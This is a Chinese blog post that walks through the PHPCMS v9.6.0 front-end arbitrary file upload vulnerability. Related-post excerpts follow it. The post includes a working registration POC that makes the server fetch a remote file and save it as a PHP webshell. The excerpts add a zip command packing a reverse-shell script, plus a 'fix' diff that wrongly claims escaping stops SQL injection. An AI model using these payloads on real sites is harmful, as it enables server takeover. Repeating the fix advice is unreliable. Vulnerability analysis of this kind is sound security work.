PHPCMSv9.6.0前端任意文件上传漏洞分析

已于 2023-01-29 19:39:48 修改
阅读量1k 收藏 1
点赞数
分类专栏: 代码审计 文章标签: php
于 2023-01-29 00:48:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_47533648/article/details/128783722
版权

2023年将会持续于B站、优快云等各大平台更新,可加入粉丝群与博主交流:838681355,为了老板大G共同努力。

一、路径

漏洞分析:/index.php?m=member&c=index&a=register&siteid=1  前台注册页面处
路径: /phpcms/modules/member/index.php

注册处抓包:
POST /phpcms/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1

siteid=1&modelid=10&username=123456&password=123456&pwdconfirm=123456&email=123456%40qq.com&nickname=123456&info%5Bbirthday%5D=2022-04-28&dosubmit=%E5%90%8C%E6%84%8F%E6%B3%A8%E5%86%8C%E5%8D%8F%E8%AE%AE%EF%BC%8C%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%86%8C&protocol=

在这里插入图片描述

二、分析

正常流程分析:
函数定位:register,代码做验证处理
在这里插入图片描述
接着往下走,有验证处理模块:
在这里插入图片描述
验证完毕没有重复后,接下来做获取会员信息的模块:传入info值

关键点:$_POST['info'] = array_map('new_html_special_chars',$_POST['info']);

在这里插入图片描述
根据下方get函数定位追踪:——> member_input.class.php
在这里插入图片描述
观察fields函数,追踪赋值,回到get函数,得知get是做了一个校验的操作。
校验结束之后,将表单插入数据库中:
在这里插入图片描述
观察数据库:
在这里插入图片描述

10——>birthday生日  11——>content内容
POC:
siteid=1&modelid=11&username=NSdemon&password=NSdemon123&pwdconfirm=123456&email=NSdemon@qq.com&info[content]=<img src=http://url/1.txt?.php#.jpg>& &dosubmit=1&protocol=

恶意代码存在info中
在这里插入图片描述
通过了array_map进行处理,追踪array_map分析:
new_html_special_chars做防XSS的过滤,对尖括号进行转义的方式。
在这里插入图片描述
往下走传入get中,$data最后传入value中,追踪value
在这里插入图片描述
截取长度的处理函数:
在这里插入图片描述
做了一个数据查询的处理:
在这里插入图片描述
处理完modelid函数后,追踪editor
在这里插入图片描述

$value = $this->attachment->download(‘content’, v a l u e , value, value,watermark_enable);
对传入的值做了一个处理操作,追踪下文: phpcms/libs/classes/attachment.class.php
在这里插入图片描述

做了一个后缀处理:gif|jpg|jpeg|bmp|png
s t r i n g = n e w s t r i p s l a s h e s ( string = new_stripslashes( string=newstripslashes(value);做了一个new_stripslashes处理
追踪查看: phpcms/libs/functions/global.func.php
在这里插入图片描述
做防止恶意代码
if(!preg_match_all(“/(href|src)=([|']?)([^ '>]+($ext))\2/i”, $string, $matches)) return $value; 做了正则处理,来校验后缀。
处理完后,将进入matches做处理:
在这里插入图片描述
用fillurl做了处理,追踪查看分析:/phpcms/libs/classes/attachment.class.php
在这里插入图片描述
核心问题代码:去掉了#处理,去掉了poc后的#.jpg
在这里插入图片描述
通过Okurl进行拼接,将原本的.php拼回给了url
在这里插入图片描述
最后将马加载去了服务器地址中,由此写入webshell。
在这里插入图片描述

PHPCMS V9.6.0任意文件上传漏洞
谢公子的博客
09-09 1789
目录 PHPCMS PHPCMS V9.6.0任意文件上传漏洞 PHPCMS PHPCMS是一款网站管理软件,该软件采用模块化开发,支持多种分类方式,使用它可方便实现个性化网站的设计、开发与维护。它支持众多的程序组合,可轻松实现网站平台迁移,并可广泛满足各种规模的网站需求,可靠性高,是一款具备文章、下载、图片、分类信息、影视、商城、采集、财务等众多功能的强大、易用、可扩展的优秀网站管理软件...
phpcms v9.6.0任意文件上传漏洞复现与原理分析(CVE-2018-14399)
不想当脚本小子的脚本小子
12-26 3127
一、漏洞描述 PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意PHP代码。 二、漏洞影响版本 PHPCMS 9.6.0 三、漏洞环境搭建 1.解压下载的文件,然后把文件放到phpstudy的网站根目录下,浏览器访问127.0.0.1/phpcms/install/install.php,开始安装 在创..
【2】phpcms v9.6.0任意文件上传漏洞
司徒荆的博客
05-21 2942
phpcms v9.6.0任意文件上传漏洞
phpcms头像上传漏洞以及后续影响分析
最新发布
a1852384503的博客
03-07 869
曾经phpcms头像上传漏洞火极一时,因为互联网上大量的网站都是这个架构,导致很多网站被黑。简单来说就是phpcms对头像上传的处理方式:他先进行上传zip文件,在进行解压,在删除非图片格式的文件。这个漏洞可以来说是一个典型的逻辑型漏洞,先进行解压就让恶意用户有了可趁之机。
phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)
AgonYAN的博客
07-25 3502
phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)
PHPCMS v9.6.0 任意文件上传漏洞分析
aixuan9365的博客
05-16 515
引用源:http://paper.seebug.org/273/ 配置了php debug的环境,并且根据这篇文章把流程走了一遍,对phpstorm的debug熟练度+1(跟pycharm一样) 用户名和email都要随便生成,因为注册名不能相同,所以修改了下脚本。 import re import requestsimport sysimport randomdef ...
PHPcms V9 任意文件上传漏洞
qax
09-04 6155
之前碰到一个站点,存在目录遍历,看到upload目录下上传了好多php的大马,说明这网站肯定是有漏洞的,看了一下网站指纹,是phpcms的,正好借此网站复现一下此漏洞 一丶漏洞简介 此漏洞爆出来的时间是2017年4月份左右,时间比较长了,存在任意文件长传,漏洞利用比较简单,危害很大,可以直接前台getshell。 二丶影响版本 phpcms v9.6.0 三丶漏洞分析 漏洞利用点是注册的地方,我们来看一下网上常用的一个payload: http://127.0.0.1/index.php.
phpcms v9.6.0版本
09-09
phpcms v9.6.0中,这个漏洞可能源于不安全的输入验证或不当的文件处理机制,允许攻击者通过HTTP请求在服务器上执行恶意脚本。 phpcms是一款广泛使用的开源内容管理系统,它基于PHP语言开发,搭配MySQL数据库,...
phpcmsv9.0任意文件上传漏洞解析
01-19
POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Fire...
PHPCMS v9.6.0 GBK
10-23
 版本v9.6.0 功能变更及bug修正说明: 适配php5.5 php5.6 php7安装改成使用mysqli模块,不在使用mysql模块,默认使用mysqli模块。升级用户不受影响string2array函数改成json处理,为了保持兼容函数名称没做变动后台...
phpcms上传漏洞
m0_70349048的博客
03-11 936
pspcms上传漏洞
phpcms v9.任意文件上传漏洞复现
newlife1441的博客
08-15 4902
如果你也出现上面的情况请试试下面说的方法:这里有一个小坑注意,你在压缩前面的文件时要注意他们在压缩文件中的顺序,意思就是你创建的一个php文件在创建的txt文件的上面就可以成功,只有这样在解压失败后它还是能够保留并将php文件成功解压出来。时间竞争漏洞利用原理其实就是在解压文件后与删除限制的文件之间的时间空隙来利用提前在限制的文件中写好的利用代码在非解压目录下生成新的不会被删除的新文件(木马),通过这个木马来拿下网站。原理:这里我们通过利用解压文件在解压过程出错会导致后面的递归删除操作不会执行的特点。...
传感与检测技术,Pt100热电阻测温实验报告,江南大学物联网(1)
2401_85015014的博客
05-16 766
/返回 x 的系数 k 公式:k = (n sum( xy ) - sum( x ) sum( y )) / (n sum( x^2 )-sum(x) ^ 2)System.out.println(“非线性误差为:” + Math.abs(maxy/fully*100) + “%”);//返回常量系数系数 b 公式:b = sum( y ) / n - k * sum( x ) / n。System.out.println(“灵敏度为:” + Math.abs(s));//返回对应项相乘后的和。
phpcms漏洞_phpcms v9.6.0前台任意文件上传漏洞分析
weixin_39809793的博客
11-21 942
前言上一节我们分析phpcms的后台get shell, 但是众所周知, 开发者对后台的漏洞 是不太上心的。因为管理员账号一般只有网站所有者才会有,如果入侵者能获取到管理员 账号,那么基本上意味着网站的所有信息都为他打开了大门,后台漏洞也就不那么重要了。 那么今天要分析的是phpccms 9.6.0版本的前台get shell. 漏洞的利用方式极其简单。 但是相对而言,代码的漏洞实现逻辑就没有前...
【学习笔记】PHPCMS v9.6.0 任意文件上传漏洞
chualam的博客
11-01 389
漏洞触发点在注册功能 我们的提交攻击载荷在$_POST['info'] 可以注意到它被htmlspeicalchar处理 主要将尖括号转换为html实体 看到变量名$func ='editor' -看到$value = xxx -> download(content ) 什么是锚点:是网页制作中超级链接的一种,又叫命名锚记。命名锚记像一个迅速定位器一样是一种页面内的超级链接,运用相当普遍 相当于id= 或者 href="#top" playload = x
PHPCMS v9.6.0任意文件上传漏洞分析笔记
foolisheddy
05-05 5103
PHPCMS v9.6.0任意文件上传漏洞分析笔记 PHPCMS v9.6.0任意文件上传漏洞分析笔记 参考: 安装: 漏洞复现: 漏洞分析: index.php member/index.php 正常请求 register()函数: htmlspecialchars()函数: menberinput−&gt;get(menberinput−&gt;get(menber_input->g...
威胁快报|CVE漏洞PHPCMS2008 /type.php代码注入高危漏洞预警(CNVD-C-2018-127157/CVE-2018-19127)...
weixin_34129696的博客
11-28 319
摘要:11月4日,阿里云安全首次捕获PHPCMS 2008版本的/type.php远程GetShell 0day利用攻击,攻击者可以利用该漏洞远程植入webshell,导致文件篡改、数据泄漏、服务器被远程控制等一系列严重问题。建议受影响用户尽快升级到最新版本修复。 ———————PHPCMS网站内容管理系统是国内主流CMS系统之一,同时也是一个开源的PH...
phpcms 漏洞
erjian666的博客
11-02 3005
这个漏洞是某司的一位前辈发出来的,这里只是复现一下而已。 原文地址:https://www.t00ls.net/thread-39226-1-1.html 首先我们本地搭建一个phpcms9.6.0的环境 下载地址:http://www.mycodes.net/43/3365.htm   点击注册页面,进行抓包 在本地创建一个txt文本,写入一句话木马 POC s...
Phpcms漏洞
Grey的博客
07-08 3050
phpcms漏洞 最近某位大牛说,将放出3个phpcms0day漏洞,目前我所了解到的已经有2个phpcms漏洞被流传开来,并放出了poc。phpcms应用范围还是比较广的,在此记录分享一下几个最新的phpcms漏洞。免责申明:文章中的工具等仅供个人测试研究,请在下载后24小时内删除,不得用于商业或非法用途,否则后果自负phpcms 任意文件读取漏洞更新于2017年5月4日漏洞具体细节参考:ht...
phpcmsv9的文件上传漏洞
12-30
### PHPCMS V9 文件上传漏洞概述 PHPCMS V9 存在一个严重的文件上传漏洞,攻击者可以通过特定路径上传恶意 PHP 脚本并执行任意代码。该漏洞主要源于系统未能严格验证上传文件的类型和内容,在某些情况下允许带有 `.php` 扩展名或其他可执行脚本类型的文件通过审核机制。 #### 漏洞成因分析 在处理文件上传的过程中,如果程序逻辑设计不当,则可能导致安全风险。具体来说: - 当尝试上传包含图片和其他扩展名(如`.php`)的压缩包时,尽管图像文件得以保留,但PHP文件会被移除[^3]。 这种行为表明服务器端确实进行了部分过滤操作,然而对于ZIP等归档格式的支持却成为了潜在的安全隐患——即攻击者能够利用这一点绕过常规检查流程实现恶意目的。 #### 利用方式 为了成功触发这一漏洞,通常的做法是构造特制的数据提交给目标应用的服务接口。例如,将正常图片与隐藏有恶意代码片段的PHP文件打包在一起发送至指定位置;一旦解压过程发生错误或疏漏,就可能造成后者被放置到Web根目录内从而获得远程控制权限。 ```bash # 构造含有恶意payload的zip文件 zip -r evil.zip shell.php image.jpg ``` 上述命令创建了一个名为 `evil.zip` 的压缩文档,其中包含了合法图片以及一个用于获取反向Shell连接的PHP木马(`shell.php`)。 #### 安全修复建议 针对此类问题的最佳实践措施如下所示: 1. **加强MIME Type校验** 修改配置项以增强对HTTP请求头中的Content-Type字段解析能力,确保只接受预期范围内的媒体资源形式。 2. **启用白名单策略** 对于所有涉及文件I/O的操作均应采用严格的正则表达式匹配模式来限定接收对象仅限于已知无害类别,并且严禁任何形式的动态解释执行环境外来的指令集。 3. **实施多层防护体系** 结合前端JavaScript预览插件、中间件代理审查服务还有后台数据库记录审计等多种手段共同作用,形成全方位立体化的防御网络结构。 4. **定期更新补丁版本** 关注官方发布的最新消息公告和技术支持渠道推送的通知提醒,及时安装经过充分测试认证过的修正版软件产品,减少不必要的暴露窗口期。 5. **调整源码细节** 参考社区反馈意见优化现有业务逻辑框架下的关键节点判断条件语句,比如引入更严谨的身份验证环节防止未授权访问越权篡改重要参数设置情况的发生。 ```diff // 原始代码可能存在安全隐患的地方 $password = isset($_POST[&#39;password&#39;]) && trim($_POST[&#39;password&#39;]) ? $_POST[&#39;password&#39;] : &#39;&#39;; // 改进建议后的写法更加健壮可靠 $password = !empty(trim($_POST[&#39;password&#39;])) ? htmlspecialchars(trim($_POST[&#39;password&#39;]), ENT_QUOTES, &#39;UTF-8&#39;) : null; ``` 这段改动不仅解决了原始实现中存在的SQL注入可能性,同时也增强了输入数据转义处理强度,降低了XSS跨站脚本攻击的风险水平[^5]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cllmsy_K

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值